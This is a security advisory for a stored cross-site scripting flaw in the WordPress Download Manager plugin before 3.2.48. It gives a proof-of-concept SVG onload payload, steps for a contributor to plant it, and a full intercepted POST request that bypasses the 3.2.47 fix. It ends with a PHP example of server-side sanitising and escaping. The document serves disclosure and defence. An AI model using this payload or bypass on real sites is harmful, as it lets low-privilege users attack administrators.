WPEX-ID: 68D7E132-BB8C-4E83-B8AA-39067FBD638E (wpvulndb / wpexploit)
History: Jun 22, 2022 - 12:00 a.m.

Download Manager < 3.2.48 - Contributor+ Stored Cross-Site Scripting

Published: 2022-06-22 00:00:00
Source: wpvulndb
91
Tags: cross-site scripting, contributor, download manager, admin review, security exploit, request interception, payload insertion, vulnerability detection

EPSS: 0.002
Percentile: 61.3%

The plugin does not sanitise and escape the 'Insert URL' field, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks. Note: the attempted fixes made in 3.2.46 and 3.2.47 were found to be insufficient.

As a contributor, create/edit a download and put the following payload in the 'Insert URL' field: https://example.com/?a="><svg/onload=alert(/XSS/)>

Then click on the + button next to the field to save the URL, then click on the Submit for Review button.

The XSS is triggered when the Download is edited (for example, when an admin reviews it).

In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to https://example.com/?a="><svg/onload=alert(/XSS/)>:


POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1887
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=d1f3acca93&user_ID=1&action=editpost&originalaction=editpost&post_author=5&post_type=wpdmpro&original_post_status=publish&post_ID=6324&meta-box-order-nonce=0df29a4137&closedpostboxesnonce=ac72c29968&post_title=XSS+Contrib&samplepermalinknonce=db423b3cbb&content=&file%5Bfiles%5D%5B%5D=https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=30&aa=2022&hh=22&mn=21&ss=28&hidden_mm=06&cur_mm=06&hidden_jj=30&cur_jj=30&hidden_aa=2022&cur_aa=2022&hidden_hh=22&cur_hh=22&hidden_mn=21&cur_mn=21&original_publish=Update&save=Update&tax_input%5Bwpdmcategory%5D%5B%5D=0&newwpdmcategory=New+Category+Name&newwpdmcategory_parent=-1&_ajax_nonce-add-wpdmcategory=67f0ab91c8&tax_input%5Bwpdmtag%5D=&newtag%5Bwpdmtag%5D=&_thumbnail_id=-1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=925d3f1564&advanced_view=1&comment_status=open&add_comment_nonce=d2ac60592b&_ajax_fetch_list_nonce=608563959a&post_name=xss-contrib&post_author_override=5&file%5Bversion%5D=&file%5Blink_label%5D=&file%5Bquota%5D=&file%5Bview_count%5D=1&file%5Bdownload_count%5D=&file%5Bpackage_size%5D=&file%5Baccess%5D%5B%5D=guest&file%5Bpage_template%5D=page-template-default.php&file%5Bterms_page%5D=&file%5Bterms_title%5D=&file%5Bterms_conditions%5D=&file%5Bterms_check_label%5D=&file%5Bpassword%5D=&file%5Bicon%5D=
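The root cause stated above is missing sanitisation on save and missing escaping on output, and the 3.2.47 bypass shows why client-side checks are not enough once the file[files][] parameter is edited in transit. The following is an added PHP example written for this page, not Download Manager's own code; the function names, the 'wpdm_files' meta key and the save_post_wpdmpro hook are assumptions modelled on the request shown above.

```php
<?php
// Added example, not the plugin's code. Hook, meta key and field layout
// are assumptions based on the POST body above (post_type=wpdmpro,
// file[files][] as an array of URLs).

/**
 * Sanitise submitted file URLs on the server when the post is saved.
 * Runs regardless of what the front-end JS did, so a proxied request that
 * rewrites file[files][] is handled the same way as a normal form submit.
 */
function example_wpdm_save_files( int $post_id ): void {
    if ( ! isset( $_POST['file']['files'] ) || ! is_array( $_POST['file']['files'] ) ) {
        return;
    }
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    $clean = array();
    foreach ( $_POST['file']['files'] as $raw ) {
        $raw = wp_unslash( (string) $raw );
        // esc_url_raw() strips characters that are never valid in a URL
        // (including " < >) and enforces the protocol allowlist given here.
        $url = esc_url_raw( $raw, array( 'http', 'https' ) );
        // Anything that is still not an absolute http(s) URL with a host is
        // rejected rather than stored.
        if ( '' === $url || empty( wp_parse_url( $url, PHP_URL_HOST ) ) ) {
            continue;
        }
        $clean[] = $url;
    }
    update_post_meta( $post_id, 'wpdm_files', $clean );
}
add_action( 'save_post_wpdmpro', 'example_wpdm_save_files' );

/**
 * Escape again when rendering the edit screen. Stored meta is treated as
 * untrusted and escaped for the exact output context (an HTML attribute),
 * so a value that reached the database by another path still cannot
 * break out of the value="..." attribute.
 */
function example_wpdm_render_files( int $post_id ): string {
    $out = '';
    foreach ( (array) get_post_meta( $post_id, 'wpdm_files', true ) as $url ) {
        $out .= '<input type="text" name="file[files][]" value="'
              . esc_attr( esc_url( (string) $url ) ) . '">' . "\n";
    }
    return $out;
}
```

Sanitising on save and escaping on output are independent layers; the bypass described for 3.2.47 is exactly the case where only the first layer (and only in the browser) was in place.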
